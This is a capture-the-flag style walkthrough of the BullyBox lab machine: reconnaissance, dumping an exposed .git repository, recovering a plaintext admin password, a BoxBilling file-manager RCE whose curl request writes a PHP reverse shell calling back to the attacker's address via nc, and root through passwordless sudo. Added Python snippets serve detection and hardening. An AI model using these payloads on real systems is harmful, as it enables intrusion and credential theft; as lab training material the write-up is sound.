OSCP - Proving Grounds - BullyBox

Key takeaways

  • If a domain name turns up, add it to /etc/hosts and re-run the nmap, nikto and similar scans
  • When running dirsearch, use a fuller wordlist so that nothing is missed
  • .git dump

Detailed steps

Run an nmap scan: ports 80 and 22 are open, and visiting the site redirects to bullybox.local
  Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-14 12:20 UTC
  Nmap scan report for 192.168.59.27
  Host is up (0.00072s latency).
  Not shown: 65533 closed tcp ports (reset)
  PORT   STATE SERVICE VERSION
  22/tcp open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.1 (Ubuntu Linux; protocol 2.0)
  | ssh-hostkey:
  |   256 b9:bc:8f:01:3f:85:5d:f9:5c:d9:fb:b6:15:a0:1e:74 (ECDSA)
  |_  256 53:d9:7f:3d:22:8a:fd:57:98:fe:6b:1a:4c:ac:79:67 (ED25519)
  80/tcp open  http    Apache httpd 2.4.52 ((Ubuntu))
  |_http-title: Site doesn't have a title (text/html).
  |_http-server-header: Apache/2.4.52 (Ubuntu)
Edit /etc/hosts to map the IP to bullybox.local and re-run the nmap scan; it now reports more, including a .git path and the entries in robots.txt
  Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-15 17:50 EDT
  Nmap scan report for bullybox.local (192.168.174.27)
  Host is up (0.44s latency).
  Not shown: 65533 closed tcp ports (reset)
  PORT   STATE SERVICE VERSION
  22/tcp open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.1 (Ubuntu Linux; protocol 2.0)
  | ssh-hostkey:
  |   256 b9:bc:8f:01:3f:85:5d:f9:5c:d9:fb:b6:15:a0:1e:74 (ECDSA)
  |_  256 53:d9:7f:3d:22:8a:fd:57:98:fe:6b:1a:4c:ac:79:67 (ED25519)
  80/tcp open  http    Apache httpd 2.4.52 ((Ubuntu))
  | http-robots.txt: 8 disallowed entries
  | /boxbilling/bb-data/ /bb-data/ /bb-library/
  |_/bb-locale/ /bb-modules/ /bb-uploads/ /bb-vendor/ /install/
  |_http-server-header: Apache/2.4.52 (Ubuntu)
  |_http-title: Client Area
  | http-git:
  |   192.168.174.27:80/.git/
  |     Git repository found!
  |     Repository description: Unnamed repository; edit this file 'description' to name the...
  |_    Last commit message: Ready For launch
  No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
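The second scan is where the exposure becomes visible, so as an added example (not part of the original writeup) here is a small Python parser for nmap's normal output that pulls out the open ports and the per-port NSE script results and turns the http-git and http-robots.txt hits into review findings. The sample scan is a constructed, trimmed copy modelled on the output above; the function names are my own.

```python
import re

# Constructed sample: a trimmed copy of what `nmap -sV -sC` prints for a host
# whose web root exposes both robots.txt and a .git directory (modelled on the
# scan above; the values are illustrative).
SAMPLE_SCAN = """\
Nmap scan report for bullybox.local (192.168.174.27)
Host is up (0.44s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|_  256 53:d9:7f:3d:22:8a:fd:57:98:fe:6b:1a:4c:ac:79:67 (ED25519)
80/tcp open  http    Apache httpd 2.4.52 ((Ubuntu))
| http-robots.txt: 8 disallowed entries
| /boxbilling/bb-data/ /bb-data/ /bb-library/
|_/bb-locale/ /bb-modules/ /bb-uploads/ /bb-vendor/ /install/
|_http-server-header: Apache/2.4.52 (Ubuntu)
|_http-title: Client Area
| http-git:
|   192.168.174.27:80/.git/
|     Git repository found!
|_    Last commit message: Ready For launch
"""

# "22/tcp open  ssh     OpenSSH ..." -> port, proto, state, service, version
PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)\s*(.*)$")
# "| http-git:" or "|_http-title: Client Area" -> NSE script name and its first
# line; continuation lines ("|   ...", "|_  ...", "|_/path ...") carry no name
SCRIPT_RE = re.compile(r"^\|[_ ]([\w.-]+):\s*(.*)$")


def parse_nmap(text):
    """Parse nmap's normal output into a list of ports, each with its NSE script output."""
    ports, current, script = [], None, None
    for raw in text.splitlines():
        line = raw.rstrip()
        m = PORT_RE.match(line)
        if m:
            current = {"port": int(m.group(1)), "proto": m.group(2), "state": m.group(3),
                       "service": m.group(4), "version": m.group(5), "scripts": {}}
            ports.append(current)
            script = None
            continue
        if current is None or not line.startswith("|"):
            continue
        m = SCRIPT_RE.match(line)
        if m:
            script = m.group(1)
            current["scripts"][script] = [m.group(2)] if m.group(2) else []
        elif script is not None:
            # continuation line: drop the "|", "|_" and indentation prefix
            current["scripts"][script].append(line.lstrip("|_ "))
    return ports


def findings(ports):
    """Turn the parsed scan into findings a defender should act on."""
    out = []
    for p in ports:
        if p["state"] != "open":
            continue
        tag = f"{p['port']}/{p['proto']}"
        scripts = p["scripts"]
        if any("Git repository found" in line for line in scripts.get("http-git", [])):
            out.append(f"{tag}: .git directory served by the web server; "
                       "source code and history can be downloaded")
        if "http-robots.txt" in scripts:
            # first line is the count ("8 disallowed entries"), the rest are paths
            paths = " ".join(scripts["http-robots.txt"][1:]).split()
            out.append(f"{tag}: robots.txt advertises {len(paths)} paths: {', '.join(paths)}")
    return out


if __name__ == "__main__":
    for f in findings(parse_nmap(SAMPLE_SCAN)):
        print(f)
```

Feeding real scans through it (`nmap -sV -sC -oN scan.txt ...`, then `parse_nmap(open("scan.txt").read())`) gives a quick way to flag the two things this box turns on: a served `.git/` directory, which hands out the full source and history, and a robots.txt that lists the application's internal directories.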
Browsing the paths listed in robots.txt turns up what looks like an admin username

A web search for a tool that can dump a .git directory turns up GitHub - arthaud/git-dumper: A tool to dump a git repository from a website. Running it dumps the repository successfully; if a proxy is configured, remember to run unset http_proxy first, otherwise it fails with a 502 error
  C:\home\kali\Documents\OFFSEC\GoToWork\BullyBox\git-dumper-master> python git_dumper.py http://bullybox.local/.git ~/Documents/OFFSEC/GoToWork/BullyBox/git-dumper-master/dump
  /home/kali/Documents/OFFSEC/GoToWork/BullyBox/git-dumper-master/git_dumper.py:409: SyntaxWarning: invalid escape sequence '\g'
    modified_content = re.sub(UNSAFE, '# \g<0>', content, flags=re.IGNORECASE)
  [-] Testing http://bullybox.local/.git/HEAD [502]
  [-] http://bullybox.local//.git/HEAD responded with status code 502

  C:\home\kali\Documents\OFFSEC\GoToWork\BullyBox\git-dumper-master> unset http_proxy

  C:\home\kali\Documents\OFFSEC\GoToWork\BullyBox\git-dumper-master> python git_dumper.py http://bullybox.local/.git ~/Documents/OFFSEC/GoToWork/BullyBox/git-dumper-master/dump
  /home/kali/Documents/OFFSEC/GoToWork/BullyBox/git-dumper-master/git_dumper.py:409: SyntaxWarning: invalid escape sequence '\g'
    modified_content = re.sub(UNSAFE, '# \g<0>', content, flags=re.IGNORECASE)
  [-] Testing http://bullybox.local/.git/HEAD [200]
  [-] Testing http://bullybox.local/.git/ [403]
  [-] Fetching common files
  [-] Fetching http://bullybox.local/.git/hooks/post-update.sample [200]
  [-] Fetching http://bullybox.local/.git/hooks/pre-commit.sample [200]
  [-] Fetching http://bullybox.local/.git/hooks/post-commit.sample [404]
  [-] http://bullybox.local/.git/hooks/post-commit.sample responded with status code 404
  [-] Fetching http://bullybox.local/.git/hooks/pre-applypatch.sample [200]
  [-] Fetching http://bullybox.local/.git/description [200]
  [-] Fetching http://bullybox.local/.gitignore [404]
  [-] http://bullybox.local/.gitignore responded with status code 404
  [-] Fetching http://bullybox.local/.git/hooks/post-receive.sample [404]
  [-] http://bullybox.local/.git/hooks/post-receive.sample responded with status code 404
  [-] Fetching http://bullybox.local/.git/hooks/applypatch-msg.sample [200]
  [-] Fetching http://bullybox.local/.git/COMMIT_EDITMSG [200]
  [-] Fetching http://bullybox.local/.git/hooks/pre-rebase.sample [200]
  [-] Fetching http://bullybox.local/.git/hooks/commit-msg.sample [200]
  [-] Fetching http://bullybox.local/.git/hooks/pre-push.sample [200]
  [-] Fetching http://bullybox.local/.git/hooks/prepare-commit-msg.sample [200]
  [-] Fetching http://bullybox.local/.git/index [200]
  [-] Fetching http://bullybox.local/.git/objects/info/packs [404]
  [-] http://bullybox.local/.git/objects/info/packs responded with status code 404
  [-] Fetching http://bullybox.local/.git/hooks/pre-receive.sample [200]
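Note what the dumper log shows from the server's side: `/.git/` itself answered 403 (directory listing off), but every individual file under it answered 200, so the repository was still fully readable. As an added example (my own code, not part of the writeup or of git-dumper), here is detection logic for the web server's access log that spots a client walking the `.git` tree and reports whether the server actually handed out repository data. The log lines are constructed samples in Apache combined format; the client address, the user agent string and the object path are illustrative.

```python
import re
from collections import defaultdict

# Constructed sample log: two ordinary visitors plus one client reading the
# .git directory the way a dumper does (HEAD, index, then objects). One stray
# 404 probe from another address shows that a single miss does not trigger.
SAMPLE_LOG = """\
10.0.0.5 - - [15/Oct/2024:17:52:01 -0400] "GET /index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
10.0.0.9 - - [15/Oct/2024:17:52:03 -0400] "GET /robots.txt HTTP/1.1" 200 210 "-" "Mozilla/5.0"
10.0.0.9 - - [15/Oct/2024:17:53:10 -0400] "GET /.git/HEAD HTTP/1.1" 200 23 "-" "Python-urllib/3.11"
10.0.0.9 - - [15/Oct/2024:17:53:10 -0400] "GET /.git/ HTTP/1.1" 403 278 "-" "Python-urllib/3.11"
10.0.0.9 - - [15/Oct/2024:17:53:11 -0400] "GET /.git/description HTTP/1.1" 200 73 "-" "Python-urllib/3.11"
10.0.0.9 - - [15/Oct/2024:17:53:11 -0400] "GET /.git/index HTTP/1.1" 200 4380 "-" "Python-urllib/3.11"
10.0.0.9 - - [15/Oct/2024:17:53:12 -0400] "GET /.git/objects/info/packs HTTP/1.1" 404 196 "-" "Python-urllib/3.11"
10.0.0.9 - - [15/Oct/2024:17:53:12 -0400] "GET /.git/objects/ab/cd1234 HTTP/1.1" 200 512 "-" "Python-urllib/3.11"
10.0.0.5 - - [15/Oct/2024:17:54:00 -0400] "GET /.git/config HTTP/1.1" 404 196 "-" "Mozilla/5.0"
"""

# Apache/nginx combined log format: client, ident, user, [time], "request", status, size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)

# Files whose successful download proves the repository is readable, not just probed
CONFIRMING_FILES = ("/.git/HEAD", "/.git/index", "/.git/config", "/.git/packed-refs")


def parse_access_log(text):
    """Parse combined-format log lines into dicts; lines that do not match are skipped."""
    entries = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if m:
            entry = m.groupdict()
            entry["status"] = int(entry["status"])
            entries.append(entry)
    return entries


def detect_git_dump(entries, min_requests=3):
    """Return {client_ip: summary} for clients that are reading a .git directory.

    A client is reported when it makes at least `min_requests` requests under
    .git/, or when even one request for a repository file succeeded (status 200),
    because a single served HEAD already confirms the exposure."""
    per_ip = defaultdict(lambda: {"requests": 0, "served": 0, "confirmed": False, "paths": []})
    for e in entries:
        if "/.git/" not in e["path"]:
            continue
        rec = per_ip[e["ip"]]
        rec["requests"] += 1
        rec["paths"].append(e["path"])
        if e["status"] == 200:
            rec["served"] += 1
            if e["path"].endswith(CONFIRMING_FILES) or "/.git/objects/" in e["path"]:
                rec["confirmed"] = True
    return {ip: rec for ip, rec in per_ip.items()
            if rec["requests"] >= min_requests or rec["confirmed"]}


if __name__ == "__main__":
    for ip, rec in detect_git_dump(parse_access_log(SAMPLE_LOG)).items():
        state = "repository data served" if rec["confirmed"] else "probing only"
        print(f"{ip}: {rec['requests']} .git requests, {rec['served']} served, {state}")
```

The `confirmed` flag is the part worth acting on: a burst of 403/404 responses is a scanner looking, a 200 on `HEAD`, `index` or anything under `objects/` means the source has left the server and any credential it contains (as with bb-config.php below) must be treated as disclosed. The fix on the server is to deny the whole `.git` path in the vhost configuration (Apache and nginx both support a directory or location match for `/\.git`) and to never deploy by checking a working tree out into the document root.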
Running cat /bb-config.php reveals what looks like a password; combined with the username admin@bullybox.local found earlier, the login succeeds
  array (
      'type' => 'mysql',
      'host' => 'localhost',
      'name' => 'boxbilling',
      'user' => 'admin',
      'password' => 'Playing-Unstylish7-Provided',
    ),
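The credential was recoverable because a plaintext configuration file was committed to the repository and the repository was then served. As an added example (my own code, not from the writeup or BoxBilling), here is a small secret scanner of the kind that belongs in a pre-commit hook or in the review of a dumped checkout: it finds literal password-like values in PHP array syntax and in `.env`-style assignments, reports file and line, and masks the value so the report itself does not leak it. The PHP and .env samples are constructed; the values in them are placeholders, not the box's credentials.

```python
import os
import re

# Constructed sample shaped like a PHP config array; the values are placeholders.
SAMPLE_PHP = """\
<?php
return array (
  'db' => array (
    'type' => 'mysql',
    'host' => 'localhost',
    'name' => 'boxbilling',
    'user' => 'admin',
    'password' => 'Example-Secret-123',
  ),
  'salt' => 'constructed-salt-value',
  'api_key' => getenv('APP_API_KEY'),
);
"""

# Constructed .env sample; again a placeholder value.
SAMPLE_ENV = "APP_ENV=production\nDB_PASSWORD=constructed-env-secret\nDB_USER=app\n"

SECRET_WORDS = r"(?:password|passwd|pass|secret|salt|api_key|apikey|token)"
# 'password' => 'literal'   (PHP array syntax; a call such as getenv(...) is not a literal)
PHP_RE = re.compile(
    r'''['"](?P<key>[\w.-]*%s[\w.-]*)['"]\s*=>\s*['"](?P<value>[^'"]+)['"]''' % SECRET_WORDS, re.I)
# DB_PASSWORD=literal   (.env / ini style, one assignment per line)
ENV_RE = re.compile(
    r'''^(?P<key>\w*%s\w*)\s*=\s*['"]?(?P<value>[^'"\s#]+)''' % SECRET_WORDS, re.I | re.M)

CONFIG_EXTS = (".php", ".env", ".ini", ".yml", ".yaml", ".json")


def mask(value):
    """Keep only a two-character prefix so a report never repeats the secret."""
    return value[:2] + "*" * (len(value) - 2) if len(value) > 4 else "****"


def find_hardcoded_secrets(text, path="<string>"):
    """Return [{file, line, key, value(masked)}] for literal secret-like values in text."""
    hits = []
    for rx in (PHP_RE, ENV_RE):
        for m in rx.finditer(text):
            lineno = text.count("\n", 0, m.start()) + 1
            hits.append({"file": path, "line": lineno,
                         "key": m.group("key"), "value": mask(m.group("value"))})
    return sorted(hits, key=lambda h: h["line"])


def scan_tree(root):
    """Walk a checkout (skipping .git internals) and scan every config-like file."""
    results = []
    for dirpath, dirnames, filenames in os.walk(root):
        dirnames[:] = [d for d in dirnames if d != ".git"]
        for name in filenames:
            if name.endswith(CONFIG_EXTS) or name.startswith(".env"):
                full = os.path.join(dirpath, name)
                try:
                    with open(full, encoding="utf-8", errors="replace") as fh:
                        results.extend(find_hardcoded_secrets(fh.read(), full))
                except OSError:
                    pass
    return results


if __name__ == "__main__":
    for hit in find_hardcoded_secrets(SAMPLE_PHP, "bb-config.php") + find_hardcoded_secrets(SAMPLE_ENV, ".env"):
        print(f"{hit['file']}:{hit['line']}: {hit['key']} = {hit['value']}")
```

Run `scan_tree("dump")` against a checkout to get the same report for a whole tree. The two behaviours worth noting are that `getenv('APP_API_KEY')` is not flagged, because reading secrets from the environment at runtime is the pattern the scanner is steering people towards, and that a match on a committed file is a finding even if the file was later deleted, since git history keeps the old blob.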


The version turns out to be 4.22.1.5, and a quick search finds a file-upload vulnerability, BoxBilling<=4.22.1.5 - Remote Code Execution (RCE) - PHP webapps Exploit, so give it a try
First use Firefox to get the PHPSESSID saved in the cookie, start nc -nlvp locally, then send the request below. I sent it from Postman, which generates the curl command shown here
  curl --location 'http://bullybox.local/index.php?_url=%2Fapi%2Fadmin%2FFilemanager%2Fsave_file' \
  --header 'Cookie: PHPSESSID=tjlfj0mpf85cjgh8g0rjtc0jnn' \
  --header 'Content-Type: application/x-www-form-urlencoded' \
  --data-urlencode 'order_id=1' \
  --data-urlencode 'path=reverse.php' \
  --data-urlencode 'data=<?php shell_exec('\''rm /tmp/f ; mkfifo /tmp/f;cat /tmp/f | /bin/bash -i 2>&1 | nc 192.168.45.209 80>/tmp/f'\''); ?>'
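The request above works because an authenticated admin API lets the client choose both the file name (`path`) and the file contents (`data`) and the result lands somewhere the web server will execute. As an added illustration of that bug class in Python (generic code, not BoxBilling's implementation; the function names, the blocked-extension list and the demo() harness are my own), the unsafe variant writes wherever it is told, while the hardened variant confines the write to the upload directory and refuses hidden files and any name carrying a server-side-executable extension.

```python
import os
import tempfile

# Extensions PHP-enabled servers may execute; checked against every dotted
# segment of the name so "x.php.txt" is caught as well.
BLOCKED_EXTS = {".php", ".php3", ".php4", ".php5", ".php7", ".phtml", ".phar", ".phps", ".inc"}


class UnsafePath(ValueError):
    """Raised when a client-supplied path fails validation."""


def save_file_unsafe(base_dir, rel_path, data):
    """The vulnerable pattern: the client names the file and supplies its contents,
    nothing checks the extension or where the joined path resolves to."""
    target = os.path.join(base_dir, rel_path)
    with open(target, "w") as fh:
        fh.write(data)
    return target


def safe_target(base_dir, rel_path):
    """Validate a client-supplied relative path and return the absolute target."""
    base = os.path.realpath(base_dir)
    if os.path.isabs(rel_path) or "\x00" in rel_path:
        raise UnsafePath("absolute path or NUL byte")
    name = os.path.basename(rel_path)
    if not name or name.startswith("."):
        raise UnsafePath("empty or hidden file name")          # covers .htaccess, .user.ini
    segments = name.lower().split(".")[1:]
    if any("." + seg in BLOCKED_EXTS for seg in segments):
        raise UnsafePath("server-executable extension")
    target = os.path.realpath(os.path.join(base, rel_path))   # resolves ../ and symlinks
    if os.path.commonpath([base, target]) != base:
        raise UnsafePath("path escapes the upload directory")
    return target


def save_file_safe(base_dir, rel_path, data):
    """Hardened save: only validated paths, only under base_dir."""
    target = safe_target(base_dir, rel_path)
    os.makedirs(os.path.dirname(target), exist_ok=True)
    with open(target, "w") as fh:
        fh.write(data)
    return target


def demo():
    """Exercise both versions in a throwaway directory; returns what each accepted."""
    results = {}
    with tempfile.TemporaryDirectory() as root:
        uploads = os.path.join(root, "uploads")
        os.makedirs(uploads)
        # the vulnerable version happily writes a .php file into the served tree
        results["unsafe_php_written"] = os.path.isfile(
            save_file_unsafe(uploads, "reverse.php", "<?php ?>"))
        for rel in ("reverse.php", "../index.php", "x.php.txt", ".htaccess", "/etc/passwd"):
            try:
                save_file_safe(uploads, rel, "data")
                results[rel] = "written"
            except UnsafePath as exc:
                results[rel] = f"rejected: {exc}"
        ok = os.path.isfile(save_file_safe(uploads, "invoices/notes.txt", "ok"))
        results["notes.txt"] = "written" if ok else "missing"
    return results


if __name__ == "__main__":
    for name, outcome in demo().items():
        print(f"{name}: {outcome}")
```

Path validation on its own is only half of the fix: the upload directory should also be served with script execution disabled (for PHP under Apache, a `php_admin_flag engine off` or equivalent handler removal on that directory), so that a validation slip still does not turn into code execution. For this particular application the advisory's own remedy applies first, which is upgrading past the affected 4.22.1.5 release.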

This gives a reverse shell, and the user has sudo rights, so the flag can be read straight away
  C:\home\kali\Documents\OFFSEC\GoToWork\BullyBox> nc -nlvp 80
  listening on [any] 80 ...
  connect to [192.168.45.209] from (UNKNOWN) [192.168.226.27] 57090
  bash: cannot set terminal process group (1311): Inappropriate ioctl for device
  bash: no job control in this shell
  To run a command as administrator (user "root"), use "sudo <command>".
  See "man sudo_root" for details.
  yuki@bullybox:/var/www/bullybox$ id
  id
  uid=1001(yuki) gid=1001(yuki) groups=1001(yuki),27(sudo)
  yuki@bullybox:/var/www/bullybox$ sudo -l
  sudo -l
  Matching Defaults entries for yuki on bullybox:
      env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty
  User yuki may run the following commands on bullybox:
      (ALL : ALL) ALL
      (ALL) NOPASSWD: ALL
  yuki@bullybox:/var/www/bullybox$ sudo cat /root/proof.txt
  sudo cat /root/proof.txt
  2cf1d3dd8eab874dd006dad9912c1388
  yuki@bullybox:/var/www/bullybox$
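The last step needed no privilege-escalation technique at all: the account the web application runs under is in the sudo group and has `(ALL) NOPASSWD: ALL`, so the web shell was already root-equivalent. As an added example (my own code, not part of the writeup), here is a small audit helper that parses `sudo -l` output and `id` output and grades the entries, the kind of check a hardening script or a compliance scan would run on every host. The sample is modelled on the output above with one extra, constructed, scoped entry to show the difference between a blanket grant and a narrow one.

```python
import re

# Constructed sample modelled on the `sudo -l` output above; the systemctl line
# is an added, illustrative scoped entry.
SAMPLE_SUDO_L = """\
Matching Defaults entries for yuki on bullybox:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin\\:/snap/bin, use_pty

User yuki may run the following commands on bullybox:
    (ALL : ALL) ALL
    (ALL) NOPASSWD: ALL
    (root) NOPASSWD: /usr/bin/systemctl restart apache2
"""

# `id` output as printed above
SAMPLE_ID = "uid=1001(yuki) gid=1001(yuki) groups=1001(yuki),27(sudo)"

# "(ALL : ALL) ALL", "(root) NOPASSWD: /usr/bin/systemctl restart apache2"
ENTRY_RE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmds>.+)$")


def parse_sudo_l(text):
    """Return the command entries from `sudo -l` as [{runas, tags, commands}]."""
    entries, in_cmds = [], False
    for line in text.splitlines():
        if "may run the following commands" in line:
            in_cmds = True
            continue
        if not in_cmds:
            continue                      # skip the Defaults block
        m = ENTRY_RE.match(line)
        if m:
            tags = [t.rstrip(":") for t in re.findall(r"[A-Z]+:", m.group("tags"))]
            entries.append({"runas": m.group("runas").strip(), "tags": tags,
                            "commands": [c.strip() for c in m.group("cmds").split(",")]})
    return entries


def audit_sudo(entries, user):
    """Grade each entry: ALL commands is high, ALL without a password is critical,
    a passwordless but scoped command is medium."""
    findings = []
    for e in entries:
        nopasswd = "NOPASSWD" in e["tags"]
        if "ALL" in e["commands"]:
            sev = "critical" if nopasswd else "high"
            suffix = " without a password" if nopasswd else ""
            findings.append((sev, f"{user}: unrestricted sudo as ({e['runas']}){suffix}"))
        elif nopasswd:
            findings.append(("medium", f"{user}: passwordless sudo for {', '.join(e['commands'])}"))
    return findings


def groups_from_id(id_output):
    """Return the group names from `id` output, e.g. ['yuki', 'sudo']."""
    m = re.search(r"groups=(.*)$", id_output.strip())
    return re.findall(r"\d+\((\w+)\)", m.group(1)) if m else []


if __name__ == "__main__":
    user = "yuki"
    if "sudo" in groups_from_id(SAMPLE_ID):
        print(f"{user} is a member of the sudo group")
    for sev, msg in audit_sudo(parse_sudo_l(SAMPLE_SUDO_L), user):
        print(f"[{sev}] {msg}")
```

The design point is that the account running a web application should have no sudo entry at all; where an operator account genuinely needs one, it should be a specific command with arguments, as in the constructed third line, and the web application should run as a separate unprivileged user so that a web-side RCE stops at the application's own files.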